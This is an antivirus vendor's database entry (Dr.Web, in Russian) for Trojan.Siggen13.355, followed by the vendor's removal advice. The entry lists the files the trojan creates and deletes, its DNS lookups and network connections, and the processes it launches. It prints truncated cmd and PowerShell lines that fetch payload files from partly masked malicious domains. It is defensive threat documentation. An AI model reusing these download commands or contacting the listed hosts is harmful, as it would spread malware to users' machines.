Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen13.355

Добавлен в вирусную базу Dr.Web: 2021-04-02

Описание добавлено:

Техническая информация

Вредоносные функции
Создает и запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\dahqm1x8plr.exe' -
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\kr.bin
  • %TEMP%\csca6d9.tmp
  • %TEMP%\qsrfskll.out
  • %TEMP%\qsrfskll.cmdline
  • %TEMP%\qsrfskll.0.cs
  • %TEMP%\igbtaix_.dll
  • %TEMP%\res7426.tmp
  • %TEMP%\csc7425.tmp
  • %TEMP%\igbtaix_.out
  • %TEMP%\igbtaix_.cmdline
  • %TEMP%\resa6da.tmp
  • %TEMP%\igbtaix_.0.cs
  • %TEMP%\sysps.exe
  • %TEMP%\m6.bin
  • %TEMP%\if.bin
  • %TEMP%\os1ukuht.dll
  • %TEMP%\res23e5.tmp
  • %TEMP%\csc23e4.tmp
  • %TEMP%\os1ukuht.out
  • %TEMP%\os1ukuht.cmdline
  • %TEMP%\os1ukuht.0.cs
  • %TEMP%\m6.bin.ori
  • %TEMP%\qsrfskll.dll
Удаляет следующие файлы
  • %TEMP%\res23e5.tmp
  • %TEMP%\qsrfskll.dll
  • %TEMP%\qsrfskll.pdb
  • %TEMP%\qsrfskll.out
  • %TEMP%\csca6d9.tmp
  • %TEMP%\resa6da.tmp
  • %TEMP%\igbtaix_.0.cs
  • %TEMP%\igbtaix_.out
  • %TEMP%\igbtaix_.pdb
  • %TEMP%\qsrfskll.cmdline
  • %TEMP%\igbtaix_.cmdline
  • %TEMP%\csc7425.tmp
  • %TEMP%\res7426.tmp
  • %TEMP%\os1ukuht.0.cs
  • %TEMP%\os1ukuht.out
  • %TEMP%\os1ukuht.dll
  • %TEMP%\os1ukuht.cmdline
  • %TEMP%\os1ukuht.pdb
  • %TEMP%\csc23e4.tmp
  • %TEMP%\igbtaix_.dll
  • %TEMP%\qsrfskll.0.cs
Сетевая активность
Подключается к
  • 'localhost':43669
  • 'do##.#qlnetcat.com':80
TCP
Запросы HTTP GET
  • http://do##.#qlnetcat.com/sysps.dat?&x###########################################################################################################################################################...
UDP
  • DNS ASK do##.#qlnetcat.com
  • DNS ASK t.###catkit.com
  • DNS ASK pg.##9kq.com
  • DNS ASK p.##9kq.com
  • DNS ASK pg.##qh4.com
  • DNS ASK p.##qh4.com
  • DNS ASK lp##.ackng.com
  • DNS ASK ap#.890.la
Другое
Создает и запускает на исполнение
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\os1ukuht.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES23E5.tmp" "%TEMP%\CSC23E4.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\igbtaix_.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7426.tmp" "%TEMP%\CSC7425.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qsrfskll.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DA.tmp" "%TEMP%\CSCA6D9.tmp"' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='http://do##.##...
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\qsrfskll.cmdline"
  • '<SYSTEM32>\netstat.exe' -anop TCP
  • '<SYSTEM32>\nslookup.exe' lplp.ackng.com
  • '<SYSTEM32>\nslookup.exe' p.k3qh4.com
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7426.tmp" "%TEMP%\CSC7425.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\igbtaix_.cmdline"
  • '<SYSTEM32>\nslookup.exe' pg.k3qh4.com
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESA6DA.tmp" "%TEMP%\CSCA6D9.tmp"
  • '<SYSTEM32>\nslookup.exe' p.b69kq.com
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES23E5.tmp" "%TEMP%\CSC23E4.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\os1ukuht.cmdline"
  • '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='da6d146caaaea5f468ad1d7283a0ffd4';$ifp=$env:tmp+'\kr.bin';$down_url='http://...
  • '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http...
  • '<SYSTEM32>\cmd.exe' /S /D /c" echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='http://...
  • '<SYSTEM32>\cmd.exe' /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='da6d146caaaea5f468ad1d7283a0ffd4';$ifp=$env:tmp+'\kr.bin';$down_url='http://do##.##...
  • '<SYSTEM32>\cmd.exe' /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='http://do##...
  • '<SYSTEM32>\nslookup.exe' pg.b69kq.com
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -s -NoLogo -NoProfile

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке